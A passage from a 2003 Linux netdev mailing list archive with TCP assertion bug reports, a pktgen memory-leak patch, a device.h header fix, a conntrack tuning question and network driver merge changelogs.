af_inet.c(689) > Jul 17 18:27:53 fazer kernel: KERNEL: assertion (newsk->state != > TCP_SYN_RECV) failed at tcp.c(2229) > Jul 17 18:27:53 fazer kernel: KERNEL: assertion > ((1<state)&(TCPF_ESTABLISHED|TCPF_CLOSE_WAIT|TCPF_CLOSE)) failed a > t af_inet.c(689) > Jul 17 20:52:35 fazer kernel: KERNEL: assertion (newsk->state != > TCP_SYN_RECV) failed at tcp.c(2229) > Jul 17 20:52:35 fazer kernel: KERNEL: assertion > ((1<state)&(TCPF_ESTABLISHED|TCPF_CLOSE_WAIT|TCPF_CLOSE)) failed a > t af_inet.c(689) > Jul 17 21:52:16 fazer kernel: KERNEL: assertion (newsk->state != > TCP_SYN_RECV) failed at tcp.c(2229) > Jul 17 21:52:16 fazer kernel: KERNEL: assertion > ((1<state)&(TCPF_ESTABLISHED|TCPF_CLOSE_WAIT|TCPF_CLOSE)) failed a > t af_inet.c(689) > Jul 17 22:49:31 fazer kernel: KERNEL: assertion (newsk->state != > TCP_SYN_RECV) failed at tcp.c(2229) > Jul 17 22:49:31 fazer kernel: KERNEL: assertion > ((1<state)&(TCPF_ESTABLISHED|TCPF_CLOSE_WAIT|TCPF_CLOSE)) failed a > t af_inet.c(689) > > OR > Jul 12 21:33:58 fazer kernel: recvmsg bug: copied DDDA9120 seq DDDA91E9 > Jul 12 21:33:58 fazer kernel: KERNEL: assertion (flags&MSG_PEEK) failed > at tcp.c(1545) > Jul 12 21:33:58 fazer kernel: recvmsg bug: copied DDDA9120 seq DDDA91E9 > Jul 12 21:33:58 fazer kernel: KERNEL: assertion (flags&MSG_PEEK) failed > at tcp.c(1545) > Jul 12 21:33:58 fazer kernel: recvmsg bug: copied DDDA9120 seq DDDA91E9 > Jul 12 21:33:58 fazer kernel: KERNEL: assertion (flags&MSG_PEEK) failed > at tcp.c(1545) > Jul 12 21:33:58 fazer kernel: recvmsg bug: copied DDDA9120 seq DDDA91E9 > Jul 12 21:33:58 fazer kernel: KERNEL: assertion (flags&MSG_PEEK) failed > at tcp.c(1545) > Jul 12 21:33:58 fazer kernel: recvmsg bug: copied DDDA9120 seq DDDA91E9 > Jul 12 21:33:58 fazer kernel: KERNEL: assertion (flags&MSG_PEEK) failed > at tcp.c(1545) > Jul 12 21:33:58 fazer kernel: recvmsg bug: copied DDDA9120 seq DDDA91E9 > Jul 12 21:33:59 fazer kernel: KERNEL: assertion (flags&MSG_PEEK) failed > at tcp.c(1545) > Jul 12 21:33:59 fazer kernel: recvmsg bug: copied DDDA9120 seq DDDA91E9 > Jul 12 21:33:59 fazer kernel: KERNEL: assertion (flags&MSG_PEEK) failed > at tcp.c(1545) > > > If I do a rollback, no more problems... I don't test yet a 2.4.21 kernel. > > Hardware is a Dell PowerAppWeb 120A with one CPU P3 1 GHz / 256 Mo RAM / > > Now Kernel is generated under debian with kernel-source-2.4.20-2 and gcc > version 2.95.4 20011002. > > Any idea? (Thanks for your help) > > -- > Cedric Gavage > http://unixtech.be - http://gavage.com - OpenPGP: 0xED325C64 > > > - > To unsubscribe from this list: send the line "unsubscribe linux-kernel" in > the body of a message to majordomo@vger.kernel.org > More majordomo info at http://vger.kernel.org/majordomo-info.html > Please read the FAQ at http://www.tux.org/lkml/ From kambo77@hotmail.com Sat Jul 19 10:34:57 2003 Received: with ECARTIS (v1.0.0; list netdev); Sat, 19 Jul 2003 10:35:03 -0700 (PDT) Received: from hotmail.com (sea2-f21.sea2.hotmail.com [207.68.165.21]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6JHYuFl012782 for ; Sat, 19 Jul 2003 10:34:57 -0700 Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Sat, 19 Jul 2003 10:34:51 -0700 Received: from 24.98.138.238 by sea2fd.sea2.hotmail.msn.com with HTTP; Sat, 19 Jul 2003 17:34:51 GMT X-Originating-IP: [24.98.138.238] X-Originating-Email: [kambo77@hotmail.com] From: "Kambo Lohan" To: Robert.Olsson@data.slu.se Cc: netdev@oss.sgi.com, linux-kernel@vger.kernel.org Subject: Re: PATCH pktgen hang, memleak, fixes Date: Sat, 19 Jul 2003 13:34:51 -0400 Mime-Version: 1.0 Content-Type: text/plain; format=flowed Message-ID: X-OriginalArrivalTime: 19 Jul 2003 17:34:51.0628 (UTC) FILETIME=[0F1F82C0:01C34E1C] X-archive-position: 4176 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: kambo77@hotmail.com Precedence: bulk X-list: netdev That patch is bad please use the updated patch ([PATCH] [UPDATED] pktgen fixes on netdev)....I will attempt to repost while snipping the whitespace change >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> --- linux-2.4.21/net/core/pktgen.c 2002-11-28 18:53:15.000000000 -0500 +++ linux-2.4-kjp/net/core/pktgen.c 2003-07-10 13:22:17.000000000 -0400 @@ -34,6 +34,7 @@ * * The new changes seem to have a performance impact of around 1%, * as far as I can tell. * --Ben Greear + * Fix refcount off by one if first packet fails, potential null deref, memleak 030710- KJP * * Renamed multiskb to clone_skb and cleaned up sending core for two distinct * skb modes. A clone_skb=0 mode for Ben "ranges" work and a clone_skb != 0 @@ -84,9 +85,9 @@ #define cycles() ((u32)get_cycles()) -#define VERSION "pktgen version 1.2" +#define VERSION "pktgen version 1.2.1" static char version[] __initdata = - "pktgen.c: v1.2: Packet Generator for packet performance testing.\n"; + "pktgen.c: v1.2.1: Packet Generator for packet performance testing.\n"; /* Used to help with determining the pkts on receive */ @@ -613,12 +614,11 @@ kfree_skb(skb); skb = fill_packet(odev, info); if (skb == NULL) { - break; + goto out_reldev; } fp++; fp_tmp = 0; /* reset counter */ } - atomic_inc(&skb->users); } nr_frags = skb_shinfo(skb)->nr_frags; @@ -626,7 +626,9 @@ spin_lock_bh(&odev->xmit_lock); if (!netif_queue_stopped(odev)) { + atomic_inc(&skb->users); if (odev->hard_start_xmit(skb, odev)) { + atomic_dec(&skb->users); if (net_ratelimit()) { printk(KERN_INFO "Hard xmit error\n"); } @@ -731,6 +733,8 @@ (unsigned long long) info->errors ); } + + kfree_skb(skb); out_reldev: if (odev) { _________________________________________________________________ The new MSN 8: advanced junk mail protection and 2 months FREE* http://join.msn.com/?page=features/junkmail From jmorris@intercode.com.au Sat Jul 19 16:53:03 2003 Received: with ECARTIS (v1.0.0; list netdev); Sat, 19 Jul 2003 16:53:24 -0700 (PDT) Received: from blackbird.intercode.com.au (IDENT:8JfO1ALy1UG9cFG9Asj8QTou6t+/Bk/h@blackbird.intercode.com.au [203.32.101.10]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6JNr0Fl000555 for ; Sat, 19 Jul 2003 16:53:02 -0700 Received: from excalibur.intercode.com.au (excalibur.intercode.com.au [203.32.101.12]) by blackbird.intercode.com.au (8.11.6p2/8.9.3) with ESMTP id h6JNqXr10590; Sun, 20 Jul 2003 09:52:34 +1000 Date: Sun, 20 Jul 2003 09:52:33 +1000 (EST) From: James Morris To: Jim Keniston cc: Andrew Morton , , , , , , , Subject: Re: [PATCH] [1/2] kernel error reporting (revised) In-Reply-To: <3F1882CF.538FE76@us.ibm.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4177 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jmorris@intercode.com.au Precedence: bulk X-list: netdev On Fri, 18 Jul 2003, Jim Keniston wrote: > > Yes, this makes sense. At the kerror.c level, just return -EDEADLK if in_irq(). > > Delay packet delivery (via a tasklet, as before) at the evlog.c level instead. > > That way, we know at the evlog.c level (in the tasklet) whether the event packet > > was delivered to anybody, and can paraphrase it to printk if it wasn't. > > > > Is this the sort of thing you had in mind? Not exactly -- I don't think the logging framework should do any irq detection. The caller should either know if its in an interrupt, or do the detection itself. - James -- James Morris From carlos@fisica.ufpr.br Sat Jul 19 17:10:44 2003 Received: with ECARTIS (v1.0.0; list netdev); Sat, 19 Jul 2003 17:10:48 -0700 (PDT) Received: from fisica.ufpr.br (fisica.ufpr.br [200.17.209.129]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6K0AhFl001842 for ; Sat, 19 Jul 2003 17:10:44 -0700 Received: by fisica.ufpr.br (Postfix) id 984422216C2; Sat, 19 Jul 2003 21:10:41 -0300 (BRT) From: Carlos Carvalho MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-Id: <16153.56832.379224.202834@fisica.ufpr.br> Date: Sat, 19 Jul 2003 21:10:40 -0300 To: netdev@oss.sgi.com Subject: Re: Memory usage for ip_conntrack In-Reply-To: <1058563690.26030.23.camel@tux.rsn.bth.se> References: <1058558848.2674.88.camel@mentor.gurulabs.com> <1058563690.26030.23.camel@tux.rsn.bth.se> X-Mailer: VM 7.07 under Emacs 19.34.1 X-archive-position: 4178 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: carlos@fisica.ufpr.br Precedence: bulk X-list: netdev Martin Josefsson (gandalf@wlug.westbo.se) wrote on 18 July 2003 23:28: >> If I echo 102400 > /proc/sys/net/ipv4/ip_conntrack_max, what is my worst >> case memory usage? > >Don't do this. This will increase the maximum number of connections it >will track, but not the number of buckets. Which means that it will be >slower due to longer collision-chains. Instead increase the number of >buckets. modprobe ip_conntrack hashsize=131072 (or any number here. How can we increase the number of buckets with a monolithic kernel? From davem@redhat.com Sat Jul 19 19:27:32 2003 Received: with ECARTIS (v1.0.0; list netdev); Sat, 19 Jul 2003 19:27:41 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6K2RVFl008977 for ; Sat, 19 Jul 2003 19:27:32 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id TAA31339; Sat, 19 Jul 2003 19:17:23 -0700 Date: Sat, 19 Jul 2003 19:17:23 -0700 From: "David S. Miller" To: Alan Cox Cc: netdev@oss.sgi.com, cedric.gavage@unixtech.be Subject: Re: [Fwd: kernel 2.4.21] Message-Id: <20030719191723.0821227f.davem@redhat.com> In-Reply-To: <1058634345.22000.2.camel@dhcp22.swansea.linux.org.uk> References: <1058634345.22000.2.camel@dhcp22.swansea.linux.org.uk> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4179 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On 19 Jul 2003 18:05:45 +0100 Alan Cox wrote: > > Jul 17 06:31:00 fazer kernel: KERNEL: assertion (newsk->state != > > TCP_SYN_RECV) failed at tcp.c(2229) This one was fixed in 2.4.21 From tgr@reeler.org Sat Jul 19 19:55:37 2003 Received: with ECARTIS (v1.0.0; list netdev); Sat, 19 Jul 2003 19:55:41 -0700 (PDT) Received: from rei.rakuen (dclient217-162-65-211.hispeed.ch [217.162.65.211]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6K2taFl010762 for ; Sat, 19 Jul 2003 19:55:37 -0700 Received: by reeler.org id 19e4MD-0007Pb-00 for ; Sun, 20 Jul 2003 04:55:29 +0200 Date: Sun, 20 Jul 2003 04:55:29 +0200 From: Thomas Graf To: netdev@oss.sgi.com Subject: [PATCH] missing __KERNEL__ ifdef in include/linux/device.h Message-ID: <20030720025528.GA30577@rei.rakuen> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline X-Encryption: "Encrypted with ROT13 using key 42" X-archive-position: 4180 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: tgraf@suug.ch Precedence: bulk X-list: netdev Hello device.h should be protected with __KERNEL__ because it uses __KERNEL__ protected structures. Userspace applications including if_arp.h such as iproute2 will fail because it finally includes device.h as well. - thomas Index: include/linux/device.h =================================================================== RCS file: /cvs/tgr/linux-25/include/linux/device.h,v retrieving revision 1.1.1.2 diff -u -r1.1.1.2 device.h --- include/linux/device.h 10 Jul 2003 22:58:31 -0000 1.1.1.2 +++ include/linux/device.h 20 Jul 2003 02:49:12 -0000 @@ -8,7 +8,7 @@ * See Documentation/driver-model/ for more information. */ -#ifndef _DEVICE_H_ +#if defined __KERNEL__ && !defined _DEVICE_H_ #define _DEVICE_H_ #include From garzik@gtf.org Sat Jul 19 20:29:50 2003 Received: with ECARTIS (v1.0.0; list netdev); Sat, 19 Jul 2003 20:30:13 -0700 (PDT) Received: from havoc.gtf.org (host-64-213-145-173.atlantasolutions.com [64.213.145.173] (may be forged)) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6K3TnFl012645 for ; Sat, 19 Jul 2003 20:29:50 -0700 Received: by havoc.gtf.org (Postfix, from userid 500) id 8E7086653; Sat, 19 Jul 2003 23:29:43 -0400 (EDT) Date: Sat, 19 Jul 2003 23:29:43 -0400 From: Jeff Garzik To: linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: [BK PATCHES] more 2.4.x net driver merges Message-ID: <20030720032943.GA12272@gtf.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.3.28i X-archive-position: 4181 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@pobox.com Precedence: bulk X-list: netdev (just sent to Marcelo; he already merged an earlier batch) BK users may do a bk pull bk://kernel.bkbits.net/jgarzik/net-drivers-2.4 Others may download the patch from ftp://ftp.??.kernel.org/pub/linux/kernel/people/jgarzik/patchkits/2.4/2.4.22-pre7-netdrvr3.patch.bz2 This will update the following files: Documentation/networking/ifenslave.c | 90 +++- drivers/net/wireless/airo.c | 663 ++++++++++++++++++++--------------- 2 files changed, 455 insertions(+), 298 deletions(-) through these ChangeSets: (03/07/19 1.1032) [bonding] fix ifenslave ABI bug (03/07/19 1.1031) [wireless airo] Update to wireless extensions 16 (new spy API). (03/07/19 1.1030) [wireless airo] Update to wireless extensions 15 (add monitor mode). (03/07/19 1.1029) [wireless airo] Return channel in infrastructure mode. (03/07/19 1.1028) [wireless airo] Checks for small packets before transmitting them. (03/07/19 1.1027) [wireless airo] Returns proper status in case of transmission error. (03/07/19 1.1026) [wireless airo] Fix small endianness bug. (03/07/19 1.1025) [wireless airo] Don't call MIC functions if the card doesn't support them. (03/07/19 1.1024) [wireless airo] Don't sleep when the stats are requested. (03/07/19 1.1023) [wireless airo] Make locking "per thread" so it's fully preemptive. (03/07/19 1.1022) [wireless airo] Update structs with the new fields in latest firmwares. (03/07/19 1.1021) [wireless airo] Simplify dynamic buffer code in Cisco extensions. (03/07/19 1.1020) [wireless airo] sync with 2.6 Trivialities: spelling, stack usage, checking return vals, etc. From garzik@gtf.org Sat Jul 19 21:39:55 2003 Received: with ECARTIS (v1.0.0; list netdev); Sat, 19 Jul 2003 21:40:12 -0700 (PDT) Received: from havoc.gtf.org (host-64-213-145-173.atlantasolutions.com [64.213.145.173] (may be forged)) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6K4dsFl015989 for ; Sat, 19 Jul 2003 21:39:54 -0700 Received: by havoc.gtf.org (Postfix, from userid 500) id ADD08663B; Sun, 20 Jul 2003 00:39:48 -0400 (EDT) Date: Sun, 20 Jul 2003 00:39:48 -0400 From: Jeff Garzik To: linux-kernel@vger.kernel.org, netdev@oss.sgi.com Cc: torvalds@osdl.org Subject: [BK PATCHES] more 2.6.x net driver merges Message-ID: <20030720043948.GA20201@gtf.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.3.28i X-archive-position: 4182 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@pobox.com Precedence: bulk X-list: netdev Added some more stuff at bk pull bk://kernel.bkbits.net/jgarzik/net-drivers-2.6 Others may download the patch from ftp://ftp.??.kernel.org/pub/linux/kernel/people/jgarzik/patchkits/2.6/2.6.0-test1-netdrvr2.patch.bz2 This will update the following files: Documentation/networking/ifenslave.c | 346 +- MAINTAINERS | 4 drivers/net/8139too.c | 4 drivers/net/b44.c | 54 drivers/net/b44.h | 2 drivers/net/e1000/e1000_ethtool.c | 101 drivers/net/e1000/e1000_main.c | 2 drivers/net/ne2k-pci.c | 1 drivers/net/pcmcia/3c574_cs.c | 3 drivers/net/sk_mca.c | 17 drivers/net/sk_mca.h | 1 drivers/net/via-rhine.c | 17 drivers/net/wan/Kconfig | 3 drivers/net/wireless/Kconfig | 10 drivers/net/wireless/Makefile | 2 drivers/net/wireless/airo.c | 510 +-- drivers/net/wireless/wl3501.h | 1764 +++++++--- drivers/net/wireless/wl3501_cs.c | 5616 ++++++++++++++++++++++++----------- include/linux/ethtool.h | 2 19 files changed, 5835 insertions(+), 2624 deletions(-) through these ChangeSets: (03/07/19 1.1548) [wireless airo] fix 2.4-isms that break build (03/07/19 1.1547) [bonding] sync ifenslave with 2.4 (pulls in several bug fixes) (03/07/19 1.1546) [wireless airo] Update to wireless extensions 16 (new spy API). (03/07/19 1.1545) [wireless airo] Update to wireless extensions 15 (add monitor mode). (03/07/19 1.1544) [wireless airo] Return channel in infrastructure mode. (03/07/19 1.1543) [wireless airo] Checks for small packets before transmitting them. (03/07/19 1.1542) [wireless airo] Returns proper status in case of transmission error. (03/07/19 1.1541) [wireless airo] Fix small endianness bug. (03/07/19 1.1540) [wireless airo] Don't call MIC functions if the card doesn't support them. (03/07/19 1.1539) [wireless airo] Don't sleep when the stats are requested. (03/07/19 1.1538) [wireless airo] Make locking "per thread" so it's fully preemptive. (03/07/19 1.1537) [wireless airo] Update structs with the new fields in latest firmwares. (03/07/19 1.1536) [wireless airo] Simplify dynamic buffer code in Cisco extensions. (03/07/19 1.1535) [PATCH] 3c574_cs initialise spinlock This patch against 2.5.75 initialises a spinlock when the structure containing it is allocated (03/07/19 1.1534) [PATCH] Software suspend and RTL 8139too in 2.6.0-test1 This patch is needed to make software suspend work with the 8139too driver loaded. (03/07/19 1.1533) [PATCH] via-rhine 1.19-2.5: One more Rhine-I fix This patch fixes another way the Rhine-I found to break down under load. It should bring Rhine-I behavior on par with the Rhine-II. (03/07/19 1.1532) [PATCH] sk_mca (03/07/19 1.1531) [PATCH] Add ethtool TSO, Rx/Tx csum, SG Get/Set support * Add ethtool TSO, Rx/Tx csum, SG Get/Set support. (03/07/19 1.1530) [PATCH] add ethtool TSO get/set * Add TSO get/set command to ethtool interface. Applies to both 2.4/2.5. Ethtool application patch sent under separate cover. (03/07/19 1.1529) [PATCH] mark comx obsolete, by request (03/07/19 1.1528) [PATCH] fix ne2k-pci memleak ne2k-pci leaks memory on unload. dev->priv is allocated in ethdev_init(), but never freed. against 2.4-bk, but also applies to 2.5-bk with offset. (03/07/19 1.1527) [netdrvr b44] tons of fixes. should work now. (03/07/19 1.1525) [netdrvr wan] update comx maintainer, by request Previous entry said to be out of date by two years or more. (03/07/18 1.1310.96.56) o wl3501: cleanup types (03/07/18 1.1310.96.55) o wl3501: slow_down_io exists only on __i386___ The joys of having several arches at my home lab, thanks to parisc this time. (03/07/17 1.1310.96.54) o wl3501: first cut at power management support (03/07/17 1.1310.96.53) o wl3501: remove lots of uneeded casts (03/07/17 1.1310.96.52) o wl3501: create iw_default_channel Also aimed at being moved to the core wireless extensions code. (03/07/17 1.1310.96.51) o wl3501: create iw_valid_channel To validade if a channel is OK in a specific regulatory domain, I prefixed it with iw_ as I plan to move this stuff to the main wireless extensions code, ditto for the next changeset, where I'll introduce iw_chan2freq and iw_default_channel. (03/07/17 1.1310.96.50) o wl3501: use more c99 style struct initializers (03/07/16 1.1310.96.49) o wl3501: keep it simple, support only ARPHRD_ETHER packets (03/07/16 1.1310.96.48) o wl3501: nuke def_chan, useless But I still didn't managed to change the channel on the firmware... will implement wl3501_set_mib_value... (03/07/16 1.1310.96.47) o wl3501: use c99 init style for the signals also remove some unneeded casts. (03/07/15 1.1310.96.46) o wl3501: create wl3501_esbq_exec to avoid cut'n'paste in several functions (03/07/15 1.1310.96.45) o wl3501: use the regulatory domain defines I.e. less magic numbers, also rename freq_domain to reg_domain, as in regulatory domain, as the atmel driver does, and that made me realize that this defines and the function that checks if a channel is valid in a regulatory domain should be moved to the wireless extensions (or some other place) common code. (03/07/15 1.1310.96.44) o wl3501: remove llc_type stuff, not used (03/07/09 1.1310.96.43) o wl3501: remove duplicate assignment of link->irq.IRQInfo2 (03/07/07 1.1310.96.42) o wl3501: kill wl3501_mac_addr, to follow the de-facto standard for mac addrs (03/07/07 1.1310.96.41) o wl3501: kill wl3501_80211_data_mac_hdr, we already have ieee802_11_hdr (03/07/07 1.1310.96.40) o wl3501: argh, WL3501_MIB_ATTR_{SHORT,LONG}_RETRY_LIMIT is u8 (03/07/07 1.1310.96.39) o wl3501: fix some mib variables sizes Following what is in the 802.11 specs and doing experimentations. (03/07/07 1.1310.96.38) o wl3501: remove dead code that was surviving from original driver It never was used for anything meaningful, i.e. driver_state never is set to non zero. (03/07/06 1.1310.96.37) o wl3501: kill magic numbers in cap_info, fix bss_type setting it was only setting INFRA mode... (03/07/06 1.1310.96.36) o wl3501: kill WL3501_SLOW_DOWN_IO, use slow_down_io() instead Also fix some loop variables use, one of which potentially is related to ADHOC not working, i.e. it was not being properly initialized, thanks to gcc 3.3.1 (pre-release) and this was caught... (03/07/06 1.1310.96.35) o wl3501: remove more unused code in wl3501.h will be back in some way with iwpriv support. (03/07/02 1.1310.96.34) o wl3501: remove commented out code Will get back to this at some point. (03/07/02 1.1310.96.33) o wl3501: revert the change to get_encode wrt priv_opt_implemented It turns out that the first implementation of get_encode was right wrt checking WL3501_MIB_ATTR_PRIV_OPT_IMPLEMENTED, according to the "802.12 Wireless Networks - The Definitive Guide" O'Reilly book, so, put it back in. (03/07/02 1.1310.96.32) o wl3501: kill a race in wl3501_get_mib_value and more . collect statistics in wl3501_get_wireless_stats . WL3501_MIB_ATTR_PRIV_OPT_IMPLEMENTED doesn't seems to be related to WEP, remove its test in get_encode (03/07/01 1.1310.96.31) o wl3501: implement get retry wireless extension (03/07/01 1.1310.96.30) o wl3501: implement get tx power wireless extension (03/07/01 1.1310.96.29) o wl3501: implement get power wireless extension Now to study how to enable power management. (03/07/01 1.1310.96.28) o wl3501: implement get encode wireless extension . Well, this is just for completeness, as with this specific firmware in the cards I have WEP is not implemented... This is the information for the cards I have (tested just one but I doubt the others have WEP...): Card Name: OEM WLAN/WPCMCIA Firmware Date: 02.00.06 01/07/2000 12:13:49 (03/07/01 1.1310.96.27) o wl3501: implement get frag threshold wireless extension (03/07/01 1.1310.96.26) o wl3501: use the MIB stuff in this card, add one more wireless extension . Using the MIB in the card I'm now able to find lots of useful information that will get used in more support for wireless extensions. . Also some cleanups wrt ifdefing the code not yet used to write into the flash of this card and some more messages tidy up. (03/07/01 1.1310.96.25) o wl3501: use offsetof(struct wl3501_{rx,tx}_hdr, addr4) in more places (03/07/01 1.1310.96.24) o wl3501: merge some bits from yet another fork of the original sources This time from work done by Heiko Kirschke, and also do some simplification wrt access to ->addr4 in tx headers, i.e. use offsetoff and do just one wl3501_set_to_wla in wl3501_send_pkt. (03/07/01 1.1310.96.23) o wl3501: initialize link->release timer and use alloc_etherdev (03/07/01 1.1310.96.22) o wl3501: clarify arp type checking in wl3501_md_ind_interrupt Information collected from another driver source found on the net for this hardware, written by magyver@zcom.com.tw, that I'm reading to find more information about this hardware, coalescing several efforts to have a driver for this card. (03/07/01 1.1310.96.21) o wl3501: update this->rssi at wl3501_md_ind_interrupt Now the sensitivity information in iwconfig is dinamically updated. (03/07/01 1.1310.96.20) o wl3501: finally a sane use for this->def_chan! With this we can finally select in a sane way the channel to use, selectable thru wireless extensions/iwconfig interface freq nr_channel :-) (03/07/01 1.1310.96.19) o wl3501: kill one magic number, introducing WL3501_ESSID_MAX_LEN (03/07/01 1.1310.96.18) o wl3501: the first two chars in this->essid are special . The real BSSID is after the first two bytes, that is why this->bssid has 34 chars when IW_ESSID_MAX_SIZE is just 32... . Include some debug, selectable with the pc_debug kernel module parameter, that is turned off by default. (03/06/30 1.1310.96.17) o wl3501: use wl3501_reset when changing some parameters (03/06/29 1.1310.96.16) o wl3501: first cut at adding set_freq wireless extension This will require further study and probably to include the MIB stuff in the original driver. (03/06/29 1.1310.96.15) o wl3501: implement get_rate wireless extension For now returning a fixed rate of 2 Mbit/s, that is by far the most common for this thing, but perhaps this card can work at 1 Mbit/s and so I have to find out from were to get this info, without documentation coding drivers is, humm, "fun" :-\ (03/06/29 1.1310.96.14) o wl3501: subtract one from this->channel to get the correct frequency (03/06/29 1.1310.96.13) o wl3501: do proper tx throttling . check if queue was stopped when receiving interrupt tx confirmation, prior to calling netif_wake_queue. . stop the queue processing if there is less than 2 tx blocks in the card, with this I get no drops in pktgen, whee! 8) (03/06/29 1.1310.96.12) o wl3501: create channel to frequency table and use it in get_freq This table was obtained from the Planet WAP 1000 Access Point web interface, accessing it over this driver after I ran nmap against the AP box that is now only with the wireless interface, i.e. all accesses to it are over this driver :-) (03/06/29 1.1310.96.11) o wl3501: remove leftover debug from get_freq (03/06/29 1.1310.96.10) o wl3501: more wireless extensions: {get,set}_nick and get_freq (03/06/29 1.1310.96.9) o wl3501: update tx statistics (03/06/28 1.1310.96.8) o wl3501: restructure netdev handling and kill card_start abomination (03/06/28 1.1310.96.7) o wl3501: implement some more wireless extensions Also reorganize wl3501_card struct a bit to avoid wasting some bytes. This time get_sense and set_wap wireless extensions were added, work in progress, ya know 8) (03/06/28 1.1310.96.6) o wl3501: initial batch of support for wireless extensions and ethtool (03/06/27 1.1310.96.5) o wl3501: tidy up wl3501_ioctl . check if the device is present, bail out if not . move the buffer to the place where it is used . check the size of the firmware buffer passed from userspace . make wl3501_write_flash return -EIO on failure, 0 on success (03/06/27 1.1310.96.4) o wl3501: move some variable declaration to where they are needed (03/06/27 1.1310.96.3) o wl3501: add locking in the interrupt handler (03/06/27 1.1310.96.2) o wl3501: remove stupid loop (03/06/26 1.1310.60.10) o wl3501: remove comment about supporting wireless extensions It will, but is not supporting now, just some basic skeleton is in place. (03/06/26 1.1310.60.9) o wl3501: uncomment spin_lock usage, working well, have to stress this thing more now (03/06/26 1.1310.60.8) o wl3501: disabling the stupid loop for now, working well... (03/06/26 1.1310.60.7) o wl3501: use eth_copy_and_sum, assorted cleanups (03/06/26 1.1310.60.6) o wl3501: fix the bug that prevented us from reliably using MTU ~> WL3501_BLKSZ (03/06/26 1.1310.60.5) o wl3501: reorganization . use enun instead of tons of #defines . put the initial smp locking, still commented out . use some defines for magic numbers . break the rx_interrupt routine in multiple inlines for each signal type . CodingStyle cleanups . Activated the stupid loop, will now try without it, works? kill this stupidity (03/06/21 1.1310.48.6) o wl3501: new wireless driver for Planet WL 3501 802.11 PCMCIA card After a long while, and with wireless becoming a hot topic, at least for me, I get back to work on this driver, Aristeu, Niemeyer, Marcelino, this will finally be integrated! Whee! :-) From davem@redhat.com Sat Jul 19 21:55:09 2003 Received: with ECARTIS (v1.0.0; list netdev); Sat, 19 Jul 2003 21:55:12 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6K4t8Fl017013 for ; Sat, 19 Jul 2003 21:55:08 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id VAA31712; Sat, 19 Jul 2003 21:44:59 -0700 Date: Sat, 19 Jul 2003 21:44:58 -0700 From: "David S. Miller" To: Stephen Hemminger Cc: eis@baty.hanse.de, netdev@oss.sgi.com Subject: Re: [PATCH] Remove MOD_* from LAPB Message-Id: <20030719214458.2ea87a94.davem@redhat.com> In-Reply-To: <20030718133211.1c7ed08d.shemminger@osdl.org> References: <20030718133211.1c7ed08d.shemminger@osdl.org> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4183 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Fri, 18 Jul 2003 13:32:11 -0700 Stephen Hemminger wrote: > The MOD_INC and MOD_DEC in lapb are no longer necessary in 2.6 since > the module subsystem will not allow lapb to be unloaded as long as a module > that is referencing the symbols (lapb_register/lapb_unregister) is loaded. > > The lapb parameter block does have callback's so it is up to the caller > to correctly unregister on module exit; and looking at the existing code > it does do that. Applied, thanks. From davem@redhat.com Sat Jul 19 21:57:21 2003 Received: with ECARTIS (v1.0.0; list netdev); Sat, 19 Jul 2003 21:57:24 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6K4vLFl017424 for ; Sat, 19 Jul 2003 21:57:21 -0700 Received: from pizda.ninka.net 